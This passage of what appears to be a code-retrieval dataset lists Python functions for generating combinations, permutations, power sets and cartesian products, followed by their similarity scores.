tuple(iterable)\n n = len(pool)\n if r > n:\n return\n indices = list(range(r))\n yield tuple(pool[i] for i in indices)\n while True:\n for i in reversed(range(r)):\n if indices[i] != i + n - r:\n break\n else:\n return\n indices[i] += 1\n for j in range(i+1, r):\n indices[j] = indices[j-1] + 1\n yield tuple(pool[i] for i in indices)", "def combine(combination_input):\n\n output = sum([map(list, itertools.combinations(combination_input, i)) for i in range(len(combination_input) + 1)], [])\n output_final = [sorted(i) for i in output if len(i)>1]\n\n return sorted(output_final)", "def permutations(iterable):\n pass", "def AllPermutations(data):\n if len(data) <= 1:\n return data\n\n return [p for p in itertools.permutations(data)]", "def pathCombinations(A,compnts):\n linkOpt = []\n pSize = len(compnts)\n #Variable to keep track of number of nodes in the branch\n nNodes = 1\n\n #Find the links between each adjacent component in the path\n for i in range(pSize-1):\n rows,cols = np.where(A[compnts[i+1],:][:,compnts[i]]==1)\n if i == 0:\n cols += compnts[0]\n rows += nNodes\n elif i == pSize-2:\n rows += compnts[-1]\n cols += nNodes - len(compnts[i])\n else:\n rows += nNodes\n cols += nNodes - len(compnts[i])\n edges = zip(rows,cols)\n nNodes += len(compnts[i+1])\n linkOpt.append(edges)\n\n allPaths = [list(P) for P in itertools.product(*linkOpt)]\n return allPaths", "def get_param_combinations(cls):\n for key, val in cls.param.items():\n if not isinstance(val, (list, Quantity)):\n cls.param[key] = [val]\n elif isinstance(val, Quantity) and val.size == 1:\n try:\n # check if val.value is iterable, e.g. 
a list or a NumPy array\n iter(val.value)\n except:\n cls.param[key] = [val.value] * val.unit\n combos = tuple(dict(zip(cls.param, combo)) for combo in it.product(*cls.param.values()))\n return tuple(c for c in filter(cls._param_validator, combos))", "def cartesian_product_of_generators(*generators):\n tuple_size = len(generators)\n if (tuple_size == 1):\n for elem in generators[0].generate():\n yield (elem, )\n\n else:\n for sub_tuple in cartesian_product_of_generators(*generators[1:]):\n for elem in generators[0].generate():\n yield (elem, ) + sub_tuple", "def enumerate_combinations(n):\n combos = []\n for i in range(2, n): # 1 to n - 1\n _combos = list(combinations(range(n), i))\n combos += _combos\n\n combos_np = np.zeros((len(combos), n))\n for i in range(len(combos)):\n for idx in combos[i]:\n combos_np[i][idx] = 1\n\n combos_np = combos_np.astype(np.bool)\n return combos_np", "def powerset(s):\n return chain.from_iterable(combinations(s, r) for r in range(len(s) + 1))", "def test_combinations(self):\r\n self.assertFloatEqual(combinations(5, 3), 10)\r\n self.assertFloatEqual(combinations(5, 2), 10)\r\n # only one way to pick no items or the same number of items\r\n self.assertFloatEqual(combinations(123456789, 0), 1)\r\n self.assertFloatEqual(combinations(123456789, 123456789), 1)\r\n # n ways to pick one item\r\n self.assertFloatEqual(combinations(123456789, 1), 123456789)\r\n # n(n-1)/2 ways to pick 2 items\r\n self.assertFloatEqual(\r\n combinations(\r\n 123456789,\r\n 2),\r\n 123456789 *\r\n 123456788 /\r\n 2)\r\n # check an arbitrary value in R\r\n self.assertFloatEqual(combinations(1234567, 12), 2.617073e64)", "def Demo():\n print(Combination(8, 4))\n print(CombinationMethods([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 3))", "def powerset(iterable):\n xs = list(iterable)\n # note we return an iterator rather than a list\n return chain.from_iterable(combinations(xs,n) for n in range(len(xs)+1))", "def power_set(A):\n\n L = list()\n for i in range(len(A) + 1):\n L.extend([set(j) for j in itertools.combinations(A, i)])\n return L\n\n raise NotImplementedError(\"Problem 4 Incomplete\")", "def combinations(s, n):\n return (\"\".join(x) for x in tuples(s,n))", "def Allcombos():\n\n global allcombos\n\n allcombos = []\n\n results = product(\"ABCDEF\", repeat=4)\n\n allcombos = resulttolist(results)\n\n return AIguessing(allcombos)", "def get_array_combi(data_array, grid_size, combi_array):\n result = [0] * grid_size # initialise to 0's\n\n offset = 0\n for (index,size) in enumerate(data_array):\n \n head = offset + combi_array[index]\n result[head:head+size] = [1] * size\n \n offset += size\n\n return result", "def generate_valid_combos(self, prepped_equation, var_ranges, input_array):\n\n valid_combos = []\n\n # Generate the set of valid answer values as a FiniteSet. 
The\n # FiniteSet is necessary because sympy returns a FiniteSet when\n # it solves equations.\n solution_set = FiniteSet(*var_ranges[str(self.x)])\n\n # For every variable combination, substitute the values for each\n # input variable into the final_equation so sympy can solve for the\n # remaining variable.\n\n for var_values in input_array:\n final_equation = prepped_equation\n for i, var in enumerate(self.variables):\n if i < len(self.variables)-1:\n final_equation = final_equation.subs(var['variable'], var_values[i])\n\n # Solve for self.x.\n answer = solveset(final_equation, self.x)\n\n #### Currently, this is just rigged to capture when we have a single integer solution\n if self.dict['positive_only'] == True:\n answer = answer.intersection(ConditionSet(x, x > 0))\n\n # Add valid combinations to valid_combos list, with each valid combo as a dict\n if answer.issubset(solution_set) and answer != set():\n valid_combo = {}\n valid_combo['values'] = {}\n\n # Add variable values to dict\n for i, var in enumerate(self.variables):\n if i < len(self.variables)-1:\n valid_combo['values'][var['variable']] = int(var_values[i]) ### Forces int, which needs to be updated\n\n # Add answer value(s) to dict\n valid_combo['values'][self.x] = [int(i) for i in answer]\n\n valid_combos.append(valid_combo)\n\n return valid_combos", "def get_all_sample_combinations(samples1, samples2):\n import itertools\n samples = []\n for r in itertools.product(*[samples1.T, samples2.T]):\n samples.append(np.concatenate(r))\n return np.asarray(samples).T", "def get_array_index_permutations(param):\n indices = list()\n\n try:\n for d in reversed(param.get(\"dimensions\")):\n i = list()\n for x in range(0, d.get(\"len\")):\n i.append(x)\n indices.append(i)\n\n array_dereferences = list(itertools.product(*indices))\n return array_dereferences\n\n except TypeError:\n return list()", "def get_all_possible_pairs(self, a, b):\n return itertools.product(a, b)" ]
[ "0.73074627", "0.7185561", "0.6950121", "0.67702305", "0.67702305", "0.6750947", "0.6720031", "0.6644649", "0.6399782", "0.63772047", "0.63587743", "0.6318727", "0.62932175", "0.62885773", "0.62456626", "0.6200499", "0.6191303", "0.61892384", "0.61841613", "0.6181527", "0.61622316", "0.61622316", "0.61181575", "0.610233", "0.6060569", "0.60541725", "0.60429776", "0.6036647", "0.60253865", "0.6004554", "0.60024446", "0.5965597", "0.5957819", "0.59541786", "0.59391576", "0.5932418", "0.5844158", "0.5840223", "0.58291405", "0.58290356", "0.58185714", "0.5816813", "0.58052003", "0.57998043", "0.57953125", "0.57922184", "0.57786405", "0.5777211", "0.5777211", "0.57770747", "0.5776237", "0.57675785", "0.5763649", "0.5763649", "0.5763649", "0.57516813", "0.57498026", "0.5747779", "0.5740277", "0.5738083", "0.5737139", "0.5729438", "0.57233065", "0.57230717", "0.57103944", "0.57045895", "0.5703747", "0.57025903", "0.56954473", "0.5680879", "0.567955", "0.5675204", "0.5652386", "0.56432235", "0.5632993", "0.56236166", "0.56190276", "0.561761", "0.5613637", "0.55945927", "0.55894506", "0.55738693", "0.5570378", "0.5552225", "0.5538758", "0.55281544", "0.55239916", "0.55142504", "0.55107343", "0.54971045", "0.5484362", "0.5475122", "0.54725426", "0.5463139", "0.5460688", "0.54562837", "0.54401827", "0.54358786", "0.54218346", "0.5416459" ]
0.79023576
0
Indicate whether a peptide is translated by an isolated CDS. This is currently a simplified check: if the exon containing the CDS has no connected exon, the CDS is considered isolated. (The heuristic does not hold in all cases.)
def is_isolated_cds(gene, gene_info, idx):
    if len(gene_info.vertex_succ_list[idx]) > 0:
        return False
    return np.sum(gene.splicegraph.edges[:, idx]) == 0
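A minimal runnable sketch of how the predicate above might be exercised. The SimpleNamespace splice-graph objects below are hypothetical stand-ins for the real gene/gene_info classes, which are not included in this dataset row; only the function body is taken from the entry.

import numpy as np
from types import SimpleNamespace

def is_isolated_cds(gene, gene_info, idx):
    # A CDS is treated as isolated when its exon has no successor in the
    # graph and no incident edges in the splice graph's adjacency matrix.
    if len(gene_info.vertex_succ_list[idx]) > 0:
        return False
    return np.sum(gene.splicegraph.edges[:, idx]) == 0

# Toy splice graph with three exons; exon 2 has no edges at all.
edges = np.array([[0, 1, 0],
                  [1, 0, 0],
                  [0, 0, 0]])
gene = SimpleNamespace(splicegraph=SimpleNamespace(edges=edges))
gene_info = SimpleNamespace(vertex_succ_list=[[1], [], []])

print(is_isolated_cds(gene, gene_info, 0))  # False: exon 0 has a successor
print(is_isolated_cds(gene, gene_info, 2))  # True: exon 2 is disconnected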
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_isolated(self, d):\n if not self.center.is_isolated(d):\n return False\n\n for i in self.leads:\n if not i.is_isolated(d+1):\n return False\n\n return True", "def is_atomic(self):\n found = True\n if self.ant is not None:\n for p in self.ant:\n if p.conn != 'at':\n found = False\n if self.con is not None:\n for prop in self.con:\n if prop.conn != 'at':\n found= False\n return found", "def is_dip(self):\n if (\n self.dip\n and not self.deleted\n and not self.replica\n and not self.aip\n and not self.sip\n ):\n return True\n return False", "def is_isolated(self, d = None):\n if d is None:\n return len(self.__m__) == 0 or (len(self.__m__) == 1 and (0,)*self.dims in self.__m__)\n\n else:\n for k in self.__m__.keys():\n if not k[d] == 0:\n return False\n\n return True", "def is_allc(self):\n g = self.get_gene().get_seq()\n for i in range(1, len(g)):\n if g[i] is 'd':\n return False\n return True", "def is_on(self):\n return self._state != self._invert_logic", "def is_aip(self):\n if (\n self.aip\n and not self.deleted\n and not self.replica\n and not self.dip\n and not self.sip\n ):\n return True\n return False", "def is_conjugate(self):\n return self.is_dagger and bool(self.z)", "def is_alld(self):\n g = self.get_gene().get_seq()\n for i in range(1, len(g)):\n if g[i] is 'c':\n return False\n return True", "def is_cis(self):\n prev_res = self.get_offset_residue(-1)\n if prev_res is None:\n return None\n\n prev_omega = prev_res.calc_torsion_omega()\n if prev_omega is None:\n return None\n\n if abs(prev_omega) <= (math.pi/2.0):\n return True\n\n return False", "def test_is_canonical_by_transcript(self):\n assert self.icd.is_canonical_by_transcript(\"ENST00000373656\") is True\n assert self.icd.is_canonical_by_transcript(\"ENST00000373654\") is False\n assert self.icd.is_canonical_by_transcript(\"ENST00000337451\") is True\n assert self.icd.is_canonical_by_transcript(\"ENST00000398013\") is False", "def independent(self) -> bool:\n parent = self._parent()\n if parent is None:\n return True\n connections = parent._graph.connections\n path = self._path\n lp = len(path)\n for con in connections:\n if con[\"type\"] == \"connection\":\n if con[\"target\"][:lp] == path:\n return False\n return True", "def is_nucleic_acid(self):\n return False", "def non_plein(self):\n # pass\n # mon travail\n # si on trouve un espace dans le plateau , il n'est pas plein ==> true\n b = False\n for i in range(0, 3):\n for j in range(0, 3):\n if self.cases[(i, j)].contenu == \" \":\n b = True\n return b", "def is_nucleic_acid(self):\n return True", "def has_isolated_vertices(self):\n return self.properties.isolated_vertices", "def is_independent(self, word):\n return not self.is_dependent(word)", "def independent_components(self) -> bool:\n return bool(self.GetIndependentComponents())", "def use_direct_diago(self):\n return self.algo == \"direct_diago\"", "def current_involvement(doing, eid):\n if eid in doing: return True\n for dn in active_target_of(doing, eid):\n return True\n return False", "def in_isolation(self):\n return self.state in [AddressStates.ISOLATING, AddressStates.ISOLATED]", "def is_indicator():\n return True", "def is_atomic(self):\n \n symbols=set()\n for e in self.symbols:\n if not e=='':\n symbols.add(e)\n\n for s in symbols: #unicity first\n count=0\n for e in symbols:\n if s==e:\n count+=1\n if count!=1:\n return False\n else:\n continue \n temp=symbols.copy()\n for s in symbols:\n temp.remove(s)\n for e in temp:\n if s in e:\n return False\n else:\n continue\n temp=symbols.copy()\n\n 
return True", "def is_concealed(self) -> bool:\n # return not self._exposed\n return sum(self.concealed_part.values()) == 13", "def _is_solvent_accessible(protein_coords, atm, min_distance=2):\n if str(atm.atomic_symbol) == 'H':\n atm_position = np.array(atm.coordinates)\n neighbour = np.array(atm.neighbours[0].coordinates)\n direction = np.subtract(atm_position, neighbour) * 2\n position = np.array([direction + atm_position])\n distance = min(np.linalg.norm(protein_coords - position, axis=1))\n if distance > min_distance:\n return True\n else:\n return False\n\n else:\n return True", "def has_passage(self, c, d):\n\n return (self.cells[c] & (1 << d)) > 0", "def is_incomplete_cds(transcript_id):\n start_phase = get_cds_start_phase(transcript_id)\n if start_phase:\n return start_phase > 0\n else:\n return False", "def _ison(self):\n return self.dp.state()==PyTango.DevState.ON", "def independent(self):\n return True", "def has_undercoordinated_c(self) -> bool:\n if self._undercoordinated_carbon is not None:\n return self._undercoordinated_carbon\n\n self._has_undercoordinated_carbon()\n return self._undercoordinated_carbon", "def isTransitID(self, id:str) -> bool:\n\t\tif Utils.isSPRelative(id):\n\t\t\tids = id.split('/')\n\t\t\treturn len(ids) > 0 and ids[0] != CSE.cseCsi[1:]\n\t\telif Utils.isAbsolute(id):\n\t\t\tids = id.split('/')\n\t\t\treturn len(ids) > 2 and ids[2] != CSE.cseCsi[1:]\n\t\treturn False", "def isConnected(*args, ignoreUnitConversion: bool=True, **kwargs)->bool:\n pass", "def is_non_inverting(self):\n\n return False", "def ocp_is_tripped(self):\n self._raise_not_implemented()", "def is_connective(char):\n return char in [u\"¬\", u\"∧\", u\"∨\", u\"→\", u\"↔\"]", "def is_cn(self, y, t):\n return t == 0 and y == 0", "def is_on(self):\n return self._wrap_device.device.get_duct_zone(self._zone)", "def isIdeographic(ch):\n ret = libxml2mod.xmlIsIdeographic(ch)\n return ret", "def is_amino_acid(self):\n return True", "def _is_one_sided_assumption(self, assumption: TrackingAssumption) -> bool:\n if self._fuse_row:\n return all(\n y != self._row_idx for gp in assumption.gps for _, y in gp.pos\n ) or all(y != self._row_idx + 1 for gp in assumption.gps for _, y in gp.pos)\n return all(\n x != self._col_idx for gp in assumption.gps for x, _ in gp.pos\n ) or all(x != self._col_idx + 1 for gp in assumption.gps for x, _ in gp.pos)", "def is_atom_convex(self):\n return False", "def is_atom_convex(self):\n return False", "def is_amino_acid(self):\n return False", "def is_equivalence(self) -> bool:", "def is_independent(self, A):\n if self.variant.is_bipartite():\n raise ValueError()\n return not any(self.is_edge(v, w) for (v, w) in combinations(A, 2))", "def check_connected(chosen_atom, identified_bonds):\n check = False\n for bond in identified_bonds:\n if ((\"E1AE1A\" in str(get_bond_id(chosen_atom, bond[0])[0])) or (\"C1AC1A\" in str(get_bond_id(chosen_atom, bond[0])[0])) or (\"H1AH1A\" in str(get_bond_id(chosen_atom, bond[0])[0])) or (\"P1AP1A\" in str(get_bond_id(chosen_atom, bond[0])[0]))):\n check = True\n return check", "def isccp4i_info(self):\n return False", "def is_atom_concave(self):\n return False", "def is_atom_concave(self):\n return False", "def is_atom_concave(self):\n return False", "def _is_consonant(self, word, i):\n if word[i] in self.vowels:\n return False\n if word[i] == \"y\":\n if i == 0:\n return True\n else:\n return not self._is_consonant(word, i - 1)\n return True", "def _compositions_swapped(self, thermo):\n assert self._ref_indicators is not None\n\n 
indicators = self._singlet_comparison(thermo)\n\n for list1, list2 in zip(indicators, self._ref_indicators):\n comp_swapped = True\n for ind1, ind2 in zip(list1, list2):\n if ind1 == ind2:\n comp_swapped = False\n if comp_swapped:\n return True\n return False", "def is_atom_convex(self) -> bool:\n return False", "def is_atom_convex(self):\n return True", "def has_nucleic_acids(self):\n for frag in self.iter_nucleic_acids():\n return True\n return False", "def is_connected_drm():\n drm_status = xbee.atcmd(AT_CMD_DI)\n if drm_status is None or drm_status not in drm_status_connected:\n return False\n return True", "def is_simply_laced(self):\n return self._info['simply_laced']", "def is_on(self):\n return self._cur != -1", "def isclockwise(self):\n s = sum((seg[1][0] - seg[0][0]) * (seg[1][1] + seg[0][1])\n for seg in self.segment_tuples)\n return s > 0", "def have_cdc() -> bool:", "def is_on(self) -> bool:\n return self.event.is_tripped", "def connected(self):\n answer = True\n if self._value is None and self.partner is None:\n answer = False\n if answer is False and len(self._subSlots) > 0:\n answer = True\n for s in self._subSlots:\n if s.connected() is False:\n answer = False\n break\n return answer", "def is_t2t(self):\n g = self.get_gene().get_seq()\n if 'c' != g[1]:\n return False\n if not len(g) >= 8:\n return False\n for x in range(2, 4):\n if g[x] is not 'c':\n return False\n for x in range(1, len(g)-3):\n dec = 'd' if x % 4 == 0 else 'c'\n if g[x+3] is not dec:\n return False\n return True", "def obtem_ciclo_in(self):\n\n return self.ciclo_in", "def is_violated(self,\n env\n ):\n flag = any([con.is_violated(env) for con in self.constraints])\n return flag", "def is_correction_active(self):\n\n return self.is_winter_correction_active() or self.is_summer_correction_active()", "def is_atom_concave(self) -> bool:\n return False", "def is_solved(self):\n marker = self._marker\n\n count = 0\n for row in marker:\n for piece in row:\n if piece == \"*\":\n count += 1\n if count == 1:\n return True\n else:\n return False", "def inscricao(self):\n\n return True", "def continued_involvement(doing, eid, clock, step=0.01):\n if eid in doing:\n if doing[eid].end_clock > (clock+step): return True\n for dn in active_target_of(doing, eid):\n if dn.end_clock > (clock+step): return True\n return False", "def is_simple(self):\n if not self.is_compact(): return False\n\n for v in self.vertex_generator():\n adj = [a for a in v.neighbors()]\n if len(adj) != self.dim():\n return False\n\n return True", "def is_on(self) -> bool:\n val = bool(self._cluster_handler.cluster.get(self._zcl_attribute))\n return (not val) if self.inverted else val", "def _departure_on_duty(self) -> bool:\n return self._get_departure_shift().is_on_duty()", "def identical_cds(sc1,sc2):\n # Input 2 identical segment chains, return True if cds the same\n if sc1.covers(sc2) and sc2.covers(sc1):\n return True\n else:\n return False", "def done(self, streetlearn):\n return not bool(self._coin_pano_id_set)", "def is_geocoded(self):\n return self.position != None", "def is_dicotic(G):\n return G.n == 0", "def is_symmetric(self):\n _is_sym = self._is_sym\n if _is_sym is not None:\n return _is_sym\n\n n = self.degree\n if n >= 8:\n if self.is_transitive():\n _is_alt_sym = self._eval_is_alt_sym_monte_carlo()\n if _is_alt_sym:\n if any(g.is_odd for g in self.generators):\n self._is_sym, self._is_alt = True, False\n return True\n\n self._is_sym, self._is_alt = False, True\n return False\n\n return self._eval_is_alt_sym_naive(only_sym=True)\n\n 
self._is_sym, self._is_alt = False, False\n return False\n\n return self._eval_is_alt_sym_naive(only_sym=True)", "def connected(self):\n return self.izx.connected and self.ezx.connected", "def is_dna(sequentie):\r\n for nucleotide in sequentie:\r\n if nucleotide not in \"ACGTN\":\r\n return False\r\n return True", "def _isconnected(self) -> bool:\n for pin in self.pins:\n if pin._isconnected():\n return True\n\n return False", "def is_interesting(x):\n if any(x.startswith(y) for y in (\"0000\", \"0004\", \"0400\", \"0404\")):\n return False\n # The TM can't leave a state once it gets to it.\n # Either it doesn't use that state, or it loops\n # Neither is TM we are interested in\n if \"0\" == x[0] == x[2] == x[4] or \"1\" == x[6] == x[8] == x[10]:\n return False\n return True", "def is_constructing_scv(self) -> bool:\n return self.orders and self.orders[0].ability.id in {\n AbilityId.TERRANBUILD_ARMORY,\n AbilityId.TERRANBUILD_BARRACKS,\n AbilityId.TERRANBUILD_BUNKER,\n AbilityId.TERRANBUILD_COMMANDCENTER,\n AbilityId.TERRANBUILD_ENGINEERINGBAY,\n AbilityId.TERRANBUILD_FACTORY,\n AbilityId.TERRANBUILD_FUSIONCORE,\n AbilityId.TERRANBUILD_GHOSTACADEMY,\n AbilityId.TERRANBUILD_MISSILETURRET,\n AbilityId.TERRANBUILD_REFINERY,\n AbilityId.TERRANBUILD_SENSORTOWER,\n AbilityId.TERRANBUILD_STARPORT,\n AbilityId.TERRANBUILD_SUPPLYDEPOT,\n }", "def is_ivi_instrument(self): \n \n return False", "def is_on(a, b, c):\r\n return(isCollinear(a, b, c) and (within(a[0], c[0], b[0]) if a[0] != b[0] else\r\n within(a[1], c[1], b[1])))", "def is_id(self):\n found = False\n for p in self.ant:\n for prop in self.con:\n if p == prop:\n found = True\n return found", "def atPodium(self, sparseOK=False, one_mOK=False):\n pos = self.getPos()\n ok = (pos == self.GANG_ON_PODIUM) or (pos == self.GANG_AT_DENSE)\n if sparseOK:\n ok = ok or (pos == self.GANG_AT_SPARSE)\n if one_mOK:\n ok = ok or (pos == self.GANG_AT_1M)\n\n return ok", "def is_adjecent(self, cell1, cell2):\r\n if cell1 == cell2:\r\n return True\r\n elif cell1[0] == cell2[0] and (cell1[1] - cell2[1] == 1 or cell1[1] - cell2[1] == -1):\r\n return True\r\n elif cell1[1] == cell2[1] and (cell1[0] - cell2[0] == 1 or cell1[0] - cell2[0] == -1):\r\n return True\r\n else:\r\n return False", "def has_IP_property(self):\n origin = C_Polyhedron(point(0*Variable(self.space_dimension())))\n is_included = Poly_Con_Relation.is_included()\n saturates = Poly_Con_Relation.saturates()\n for c in self.constraints():\n rel = origin.relation_with(c)\n if (not rel.implies(is_included)) or rel.implies(saturates):\n return False\n return True", "def isSingleContinuum(vis, spw='', source='', intent='OBSERVE_TARGET', \n verbose=False, mymsmd=None):\n if vis=='': return False\n if type(vis) == list or type(vis) == np.ndarray:\n vis = vis[0]\n else:\n vis = vis.split(',')[0]\n if not os.path.exists(vis): return False\n needToClose = False\n if spw=='':\n if mymsmd is None:\n needToClose = True\n mymsmd = createCasaTool(msmdtool)\n mymsmd.open(vis)\n spw = getScienceSpws(vis, returnString=False, mymsmd=mymsmd)[0]\n info = transition(vis, spw, source, intent, verbose, mymsmd)\n if needToClose:\n mymsmd.close()\n if len(info) > 0:\n if info[0].find('Single_Continuum') >= 0:\n casalogPost(\"Identified spectral setup as Single_Continuum from transition name.\")\n return True\n return False", "def is_ode_noad_link(self):\n if self.project_name in IDENTIFIERS:\n return True\n else:\n return False", "def is_tentative(self):\n return self.state == TrackState.Tentative", "def 
is_tentative(self):\n return self.state == TrackState.Tentative", "def is_percolates(self):\n return self._uf.connected(self._top_idx, self._bottom_idx)", "def is_opposite(self, c):\n if self.opposite() == c:\n return True\n return False", "def is_artificial(self):\n\t\treturn 0", "def is_infrastructure (self):\n return sum([1 for i in self.infras]) != 0", "def is_solved(self):\n i = 0\n for row in self._marker:\n for x in row:\n if x == \"*\":\n i += 1\n if i > 1:\n return False\n return True", "def _compute_is_terminal(self):\n # by default the episode will terminate when all samples are labelled\n done = LalEnv._compute_is_terminal(self)\n # it also terminates when self.n_horizon datapoints were labelled\n if np.size(self.indeces_known) == self.n_horizon:\n done = True\n return done", "def is_acd(self):\n return self._is_acd" ]
[ "0.59894097", "0.5898949", "0.5672679", "0.5648508", "0.5560285", "0.5529773", "0.5459054", "0.54222125", "0.541582", "0.5374678", "0.53390956", "0.53365326", "0.53323716", "0.5328659", "0.52947295", "0.5285229", "0.5278996", "0.5277022", "0.5254552", "0.5249883", "0.5224548", "0.5172241", "0.51571554", "0.51529014", "0.51498073", "0.51232773", "0.5117219", "0.51109296", "0.51006824", "0.50965166", "0.50887454", "0.5067767", "0.5040452", "0.5039524", "0.50337976", "0.5030976", "0.50292283", "0.50271887", "0.50238866", "0.5020497", "0.5017914", "0.5017914", "0.5017494", "0.50029325", "0.49869883", "0.49846938", "0.4980708", "0.49801496", "0.49801496", "0.49801496", "0.49714917", "0.496559", "0.4952293", "0.49238014", "0.49219766", "0.49167034", "0.48957372", "0.48822367", "0.48809528", "0.48592177", "0.48476207", "0.48427665", "0.48372015", "0.48307538", "0.4815521", "0.48132563", "0.48126984", "0.48110467", "0.48075372", "0.48067978", "0.48065674", "0.47995389", "0.47921628", "0.4786523", "0.47815177", "0.47801805", "0.47800982", "0.47627783", "0.4762214", "0.47596583", "0.4757703", "0.47546405", "0.47527802", "0.47474748", "0.47467253", "0.47456646", "0.47451025", "0.47447938", "0.4742888", "0.47373432", "0.47297648", "0.4724309", "0.4724309", "0.4719934", "0.47154573", "0.47133207", "0.4705824", "0.47057992", "0.46981195", "0.4697781" ]
0.6469092
0
Split the exon into segments and get the corresponding counts.
def get_exon_expr(gene, vstart, vstop, countinfo, Idx, seg_counts): out_shape = (seg_counts.shape[1] + 1) if len(seg_counts.shape) > 1 else 2 # Todo: deal with absense of count file if vstart is np.nan or vstop is np.nan: # isolated exon case return np.zeros((0, out_shape), dtype='float') if countinfo is None or Idx.sample is None: return np.zeros((0, out_shape), dtype='float') #[np.nan] segments = gene.segmentgraph.segments sv1_id = bisect.bisect(segments[0], vstart) - 1 sv2_id = bisect.bisect(segments[0], vstop) - 1 if sv1_id == sv2_id: if len(seg_counts.shape) > 1: expr_list = np.c_[np.array([vstop - vstart]), [seg_counts[sv1_id, :]]] else: expr_list = np.array([(vstop - vstart, seg_counts[sv1_id])]) else: if len(seg_counts.shape) > 1: expr_list = np.c_[segments[1, sv1_id:sv2_id + 1] - segments[0, sv1_id:sv2_id + 1], seg_counts[sv1_id:sv2_id + 1, :]] else: expr_list = np.c_[segments[1, sv1_id:sv2_id + 1] - segments[0, sv1_id:sv2_id + 1], seg_counts[sv1_id:sv2_id + 1, np.newaxis]] expr_list[0, 0] -= (vstart - segments[0, sv1_id]) expr_list[-1, 0] -= (segments[1, sv2_id] - vstop) if gene.strand == '-': # need to reverse epression list to match the order of translation expr_list = expr_list[::-1] return expr_list
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getSegmentCount(self) -> int:\n ...", "def calculate_number_of_segments(self):\n return sum(len(eg.transcript_file.segments) for eg in self.exemplars)", "def getSegments(self) -> List[int]:\n ...", "def Test_NumSegments(Daten):\n N_Leitungen = len(Daten.PipeSegments)\n\n return N_Leitungen", "def splitCount(self):\n return 0", "def count_segments(markers) -> int:\n cnt = Counter()\n for row in markers:\n cnt.update(row)\n n_cnt = dict(takewhile(lambda x: x[1] >= 10, cnt.most_common()))\n del n_cnt[1]\n del n_cnt[-1]\n return len(n_cnt.keys())", "def outputSegmentStat(self, param_combo2array_id2no_of_segments):\n\t\tparam_combo_ls = param_combo2array_id2no_of_segments.keys()\n\t\tparam_combo_ls.sort()\n\t\tfor param_combo in param_combo_ls:\n\t\t\tarray_id2no_of_segments = param_combo2array_id2no_of_segments.get(param_combo)\n\t\t\tno_of_arrays = len(array_id2no_of_segments)\n\t\t\tno_of_segments_ls = array_id2no_of_segments.values()\n\t\t\tno_of_segments_per_array = sum(no_of_segments_ls)/float(no_of_arrays)\n\t\t\tsys.stderr.write(\"Param-combo (a, T, M) %s: %s segments per array.\\n\"%(repr(param_combo), no_of_segments_per_array))", "def test_getting_segments(self):\n pass", "def segment(data):", "def get_num_chunks(self) -> int:", "def get_segments(file_name):\n count = 1\n total_num_lines = num_lines_in_file(file_name)\n with open(file_name, 'r') as file_in:\n pre_segment = file_in.readline().split()[0]\n segments = [pre_segment]\n num_lines = []\n for line in file_in:\n line = line.split()\n if line[0].startswith(';;'):\n count += 1\n else:\n if len(line) >= LINE_LEN:\n if line[0] == pre_segment:\n count += 1\n else:\n segments.append(line[0])\n pre_segment = line[0]\n num_lines.append(count)\n count = 1\n else:\n count += 1\n last_num_lines_entry = total_num_lines - sum(num_lines)\n num_lines.append(last_num_lines_entry)\n assert len(segments) == len(num_lines), \"%i != %i\" %(len(segments), len(num_lines))\n return segments, num_lines", "def numSegments(self):\n\n return self.getHierView().numSegments()", "def total_segments(self):\n return self._total_segments", "def get_number_of_segments(self):\n\n return len(self._break_points) - 1", "def segment_n(self):\n return len(self.segment_lengths)", "def segment_counter(self):\n return self._data_writer.get_segment_counter()", "def segments(self):\n return self._segments", "def partition_Basic(segfile):\n scenelist = Recording.read_segs(segfile)\n segcount = 0\n for l in scenelist.values():\n segcount += len(l)\n return scenelist, segcount", "def _convert_to_multi_segment(self):\n\n self.header['nb_segment'] = [self.info['n_episodes']]\n\n # drop repeated signal headers\n self.header['signal_channels'] = \\\n self.header['signal_channels'].reshape(\n self.info['n_episodes'], -1)[0]\n\n # reshape signal memmap list\n new_sig_memmaps = []\n n_channels = len(self.header['signal_channels'])\n sig_memmaps = self._raw_signals[0]\n for first_index in np.arange(0, len(sig_memmaps), n_channels):\n new_sig_memmaps.append(\n sig_memmaps[first_index:first_index + n_channels])\n self._raw_signals = new_sig_memmaps\n\n self.logger.debug('New number of segments: {}'.format(\n self.info['n_episodes']))\n\n return", "def total_chunks(self) -> global___Expression:", "def count_segments_naive(self, starts, ends, points):\r\n count = [0] * len(points)\r\n \r\n for i in range(len(points)):\r\n for j in range(len(starts)):\r\n if starts[j] <= points[i] <= ends[j]:\r\n count[i] += 1\r\n \r\n return count", "def _ions(self, f):\n outside_pos = 
f.tell()\n doff = find_offset(f, 4 * b'\\xff' + 'HapsSearch'.encode('ascii'))\n # actual end of prev section is 34 bytes before, but assume 1 rec\n f.seek(doff - 62)\n # seek backwards to find the FFFFFFFF header\n while True:\n f.seek(f.tell() - 8)\n if f.read(4) == 4 * b'\\xff':\n break\n f.seek(f.tell() + 64)\n nsegments = struct.unpack('<I', f.read(4))[0]\n for _ in range(nsegments):\n # first 32 bytes are segment name, rest are something else?\n f.seek(f.tell() + 96)\n nions = struct.unpack('<I', f.read(4))[0]\n ions = []\n for _ in range(nions):\n # TODO: check that itype is actually a SIM/full scan switch\n i1, i2, _, _, _, _, itype, _ = struct.unpack('<' + 8 * 'I',\n f.read(32))\n if itype == 0: # SIM\n ions.append(i1 / 100.)\n else: # full scan\n # TODO: this might be a little hacky?\n # ideally we would need to know n for this, e.g.:\n # ions += np.linspace(i1 / 100, i2 / 100, n).tolist()\n ions += np.arange(i1 / 100., i2 / 100. + 1, 1).tolist()\n # save the file position and load the position\n # that we were at before we started this code\n inside_pos = f.tell()\n f.seek(outside_pos)\n yield ions\n outside_pos = f.tell()\n f.seek(inside_pos)\n f.seek(outside_pos)", "def split_counts(self) -> Dict[int, int]:\n if self._split_counts is None:\n self.RefreshStats()\n return self._split_counts", "def sort_and_count_segments(self, starts, ends, points):\r\n \r\n # Cons: needs lot of memeory space\r\n lst = []\r\n for i in range(len(starts)): \r\n lst.append(range(starts[i], ends[i]+1))\r\n \r\n # store all the items in list\r\n lst_2 = []\r\n for sublist in lst:\r\n for item in sublist:\r\n lst_2.append(item)\r\n \r\n sorted_lst_2 = sorted(lst_2) # get sorted list\r\n \r\n count = [0] * len(points)\r\n \r\n # 